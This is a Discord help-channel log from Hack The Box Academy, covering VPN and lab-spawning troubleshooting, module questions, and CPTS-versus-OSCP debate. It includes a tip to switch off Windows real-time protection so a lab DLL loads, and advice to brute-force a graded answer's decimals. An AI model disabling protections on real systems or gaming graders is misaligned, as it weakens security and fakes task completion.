its strange that after the Initialization Sequence Completed, there are these 2 messages.. shouldn't the "completed" message be last?

Nope those last bits are normal

Try this, after connecting to the VPN.

Add -e tun0 to the arguments

For instance,
nmap -e tun0 -sV 10.13.33.70 -v

unfortunately, doesn't help... btw does this ovpn connecton work on a pwnbox machine at all, or its meant to work only on labs?

It's likely a thing relating to the spawning issues

Ah I thought you were in your local machine. You're experiencing these problems from within pwnbox?

You may need to change vpn regions

No they stated the issue is within their kali

What was the error it said?

The pwnbox links to the vpn automatically

so I switched again the VPN, now I have a tun1 interface as well, but when I nmap the pwnbox, still remains paused

You should close the vpn when you change regions/download a new pne

sudo killall openvpn

And start the new one

yes I did that, also downloaded the new one, and started it.. but still xD..

If you have a tun1 then there's another process that is still holding the tun0

yes but I must to have a user for use webroot ?

the only thing which has changed is that I have a tun1 interface, before it didn't even appear when I was connected to a different region

Restart your vm then run the openvpn command again

you will really help me, I think if not stop for today I am going crazy in front of this chapter ^^'

Dude I haven't done this module just proposing ideas

I understand no worries

Can anyone do a sanity check on Advanced CSRF module, section XSS Filter Bypasses?

so I restarted it, now I have the tun0 interface, it popped up after connecting to the VPN, however trying the below commands but no progress. I think its a problem with HTB

then come back to it later ¯_(ツ)_/¯

Also 🗞️ don't be running around your system as root

Fuckin christ

@opal jewel sorry for the ping man. im in attacking common applications - thick client applications . im not stuck but when i try to RDP into the windows box, its just extremely slow i cant even run anything. was it the same for you or ?

@molten prawn When I did that module a month or so ago, it ran ok for me

for me its so slow i cant run anything

im using xfreerdp

I have had that issues occasionaly while rdp'ing into stuff on htb.

ive never had it

do you think Remmina would be faster a little or it has to do with the target machines issue ?

Remmina will be the same

good to know, thanks.

Ive never had issues with rdp sessions but i know it happens to people

I mean make sure you are giving ok amount of resources to a vm or maybe try attackbox

@opal jewel bread guy

Thank you very much. i got the password 🙂

stab the bread not me.

What does this have to do with htb academy?

academy look cool, but the price

Skill issue tbh

Nevermind 👀

Read #welcome to figure out how to access more of the server to ask in a relevant place

wtf ?

Yes? Can I help you?

"Skill issue tbh"

Ok? And it's in reference to the price of academy, clearly not being serious

fair

Htb academy is, in general, cheaper for the overall quality of the content

hm ah

As opposed to, say, pen200/oscp

got it y ur true

Multiple people have attested that oscp was child's play compared to cpts

yea

Heck some people are using the cpts course to prep for oscp

hello, anyone facing timeout when trying to rdp to the machine ?

Try changing to tcp download. Or changing vpn region altogether

Is no one else having this issue? It's practically unusable and making each module exercise take at least 10x longer than it should

thanks.. gonna try it

If only there was some sort of warning that boxes were having issues

The box spawning issues also relates to the stability issues

Spawning targets...?

Yes

I'm just waiting for the people to spam the blogs for the CPTS vs OSCP review 😄

Pspsps @slender shoal

I am having the same issue. Changing servers does nothing. No targets will spawn for me.

one sec

CPTS Videos

https://www.youtube.com/live/wwmCHeYd1I4

https://youtu.be/dRW1Gxmu__Q

https://youtu.be/UN5fTQtlKCc

https://www.youtube.com/watch?v=-5s2R0Mldgw

Blogs
https://eatthebuffet.github.io/posts/CPTS-or-OSCP/

https://medium.com/@0xp/why-htbs-cpts-exam-will-become-the-standard-for-modern-day-penetration-testers-34668fde209f

https://0xfa7e.github.io/post/cpts-vs-oscp/

pspsps @next bronze

I think you're missing @next bronze blog

smdh buffet I thought you were cool

https://xre0us.github.io/posts/cpts-oscp-and-you/

just copy from this next time lmao #cpts message

although, I have a question. How was initial access tricky, yet you still got everything in 4 hours lol?

it's trickier compared to what I've heard, but still easy to me

Servers are having issues.

call me sick but my attackbox is my host lol

C'mon you gotta sell the CPTS, you need to add that with CPTS training you also can figure it out 😄

and a new update on the machine. it does not even connect

that's pretty much what I said in the blog no? 😅

like i connect but after a couple minutes it kicks me out

stating network disconnected

HTB is having some issues at the moment. Try to change VPN servers.

i did

on the other servers, the vpn connection works fine but the target machine wont spawn

but on this server, the target machine spawns but i get kicked out a coulpe minutes after connecting to the rdp

its fine tho. i just hope it gets fixed soon

True, I meant in the message. Marketing is everything 🙂

They spawn fine for me, just basically unusable after that. Been the same for about a week now 😫

Unusable how? Are you connecting to the vpn successfully?

Yes can connect to VPN fine, and spawn targets fine. But after connecting to them, they are very laggy (like via SSH it can take 5-10 seconds just to recognise keystrokes) or RDP will lag and disconnect often.

mine not working too😅

Still nervous 😄

gentle reminder that when world of warcraft suffered a ddos for less than a week they gave everyone a month sub to make up for it

this is unacceptable business practice. customers have no sympathy for upstream providers. it's not their problem but paying money for access to resources that doesn't work, is.

I am doing "Password Attacks > Protected Files"'s exercise. It's asking to use Kira's password cracked prior to this exercise. I have memories of getting such a user some days ago, but I can't remember the password. I also can't find the exercise where you get it. Does someone have the password?

check your dm

Sorry, I meant Kira's password, not the answer to the exercise

Nobody learns anything by simply sharing answers to tasks

As explained above, I already did the exercise to get Kira's password some days ago, but I don't have it anymore and it's required to start the exercise I was at.

Some exercises rely on prior module answers

Try retracing your steps to see if you can't grab it again

I can't even find the exercise again

guys I'm stuck in socks over RDP section, I can't load the dll file because regsvr32 recognize it as a virus and then it delete it

You have to deactivate RealTimeProtection

never mind I figured out

thanks

Currently in the AD Enum Module. Played a bit with --loggedon-users in cme/nxc.

cme/nxc shows a bunch of users, while when I check directly on the server either with task manager or commands like "query user" or "qwinsta" etc. it only shows my currently logged in user and not all those users cme/nxc shows. On the other hand I logged in with several users on another server and its not showing anything in cme/nxc while there are currently a bunch of users logged in to the server. So take this a bit with a grain of salt? Or am I misinterpreting something? Like Users connectec via SMB etc.

Hack The Box Exhibition CTF whats the Input key to access event ?

This event is private and invite only

Also, this channel is for questions regarding academy modules

#welcome

Check this channel out for verification steps to see the other channels

you should do some offsec course labs and then complain

I also get what youre saying though

but tbf WoW has a higher revenue than htb

I have done all the offsec labs and pg. I have my oscp as well.

I tell everyone that htb academy is the best quality content even tho it isn't perfect. I have done every equivalent training in this space to make the comparison (pnpt certified as well)

Offsec labs and pg has reliable uptime btw. If you are hoping to make a comparison based on service availability there isn't one.

hey, slightly off topic but can anyone confirm if the instances on Season 4 POV are working fine. They wont start due to some server error.

#1080884182336675872 is a good place to discuss

i cannot access this

if you can't see it, read and follow instructions in #welcome

:)

got it, thanks

I actually agree. I think people make the lab reliability a bit overblown. Used to be way worse and sentiment has carried over a bit I think. But the modern labs seem fine.

I had some exam lab issues with them but that was almost entirely just their proctoring software sucking ass.

There literally was an outage 2 days ago but ok

I spent two weeks on the course and it went down like 4 times

source: his experience

Source: facts

dude

i was talking about the other guy

not you 😭

Idk wtf ur saying lol

lets be fair though. HTB has also been experiencing outages recently

Yup

they were agreeing with you

how long did this last

Hallo, I'm stack on ACTIVE DIRECTORY BLOODHOUND skills assesment last question (Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78)). I tried all things, a have found all users, but I can't issue that. Can somebody help me?

A day or so

I'm saying he said that theres "0 comparison" and that "offsec is reliable" (i.e his experience was reliable) but thats not the case for everyone

so the source was his experience not fact

Ok

I forgot the exact way to do it but you can get the ballpark number and bruteforce the decimals, after you get the answer you can work backwards to find out how to get it

I got my oscp last December

Htb outage lasting all week 💅

thanks, I'll try

IT WORKS THANK YOU. I have tryed that for 2 days, and I have already right answer, but HTB isn't took it

im doing the dssync module rn and the command Get-DomainUser doesnt exist

yet in the module it seems to work fine

anyone else had this issue?

import powerview

oh lol

thanks

hi, is it possible that the ssh brute on " Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.
" runs about 16 hrs ?

Use ftp instead

@here please I need help using the elastic kibana to search for windows event logs. i tried the input for unsuccessful login but i have got no results

@autumn pilot please I need help using the elastic kibana to search for windows event logs. i tried the input for unsuccessful login but i have got no results

which module and section is that from

how to identify available data

how to identify available data

ok, from which module and section is that?

its the SOC Analyst module on Security Monitoring and SIEM fundamentals

make sure you have set up the time correctly, e.g., last ~15 years

its says no result match search criteria when i use '4625'

hello everyone

i'm new

i don't know nothing about hacking but i want to learn about it

use htb academy

yes i'm in the htb academy

this channel is for discussing modules specifically

where i can write?

if you want to know where to start module wise thatd be a more appropriate question

@rapid sparrow is that your clone?

read #welcome and #rules

Can't spawn target or pwnbox, any updates on the ETA until it's back to normal?

Wasn’t there a beginning bible?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I can't switch vpn neither spawn targets

hi

im ezra

#📣-announcements message

nice to meet you ,my name is Ezra too, are you israeli as well?

this isn't a gen-chat

he just said hello and i said hello back

do we have generalchat somehwere tho?

Here you go #general

i dont have access there

If you have no access, read and follow #welcome

oh, thanks, and sorry

No problem 😃

How do I verify my email on HTB website?

@acoustic owl

im trying but getting this This:
Account Identifier does not appear to be the right length (must be 60 characters long).

im in the setting of htb but the only number i see is my "student id"
am i missing something?

You should get an email I think.

You have to take the identifier from the main page (app), not from the Academy

thanks

also

Now that ive verified my email i can use pwnbox?

Also should i look into what type of hacker im looking to be before i become proficient?

im looking at grey hatted or white rn

im not professional, but i think you have to learn a lot before you even get the skills required to decide

The PwnBox is available on the Academy but also on the main page.

can i pm you? related to not finding the identifier

id rather just learn to fix website's flaws and be a penetration tester

im 14 though, so im not engaging alot until im above 18

but its good to get an early start.

i learned networking and now im learning linux, afterwards i want to learn python and then subnetting, and then ill decide more, there is a lot to learn

https://app.hackthebox.com/profile/settings

python is gonna be my first coding language i'll learn

Pwnbox has a loading instance for me

its taking pretty long

i get 2 hours per day right?

im in that link i dont see it there, only studnt id

because you're likely signing into academy

im just a script kiddie rn

check your url bar; does it say app.hackthebox.com or academy.hackthebox.com

im only on the starting point's first task

on the app page; the 2 hours is lifetime

the per day is only for academy

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

set up your own vm and use the vpn

VM stands for?

how do i find out, its a question

Virtual Machine

also Google is a free resource

"What does VM stand for"

is Jack a real person?

also for any future bits please link your account to the discord so you can access #starting-point ; this channel is for academy modules not starting-point tasks

alright

how do i join academy? sorry for more questions

go to the academy website and sign up

this is confusing

the tasks

it's not at least for tier 0 stuff

again: link your htb account following the instructions in #welcome and you can ask in #starting-point